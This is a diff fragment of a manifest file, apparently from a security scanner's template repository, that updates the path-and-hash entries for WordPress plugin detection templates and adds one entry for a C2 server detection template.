-http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 +http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa +http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 +http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea -http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a -http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487 -http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb -http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e -http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95 -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7038,6 +7038,7 @@ ssl/c2/gozi-malware-c2.yaml:9073b4ec3879ff8d2c5a64badc820ba1e8bc982f ssl/c2/havoc-c2.yaml:428e8da994a4e62abaddc722fed376168f2f67fc ssl/c2/icedid.yaml:b9632d381fade1fa3163d38d504c01d111720c37 ssl/c2/metasploit-c2.yaml:24a24bd75f14c4a25c7f88c1b2143efd68672235 +ssl/c2/mythic-c2-ssl.yaml:82a6f866fdd04203e364e97199e9983b278dc4e0 ssl/c2/orcus-rat-c2.yaml:46fa20a8b13acdcc1d1809fa2f66f42ad3e759ad ssl/c2/posh-c2.yaml:fd5df3096d9fdd0f717d4981e512bd11e56c73b9 ssl/c2/quasar-rat-c2.yaml:91673602a38a05ebf84560129bf8d7cd389be5ff @@ -7054,7 +7055,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 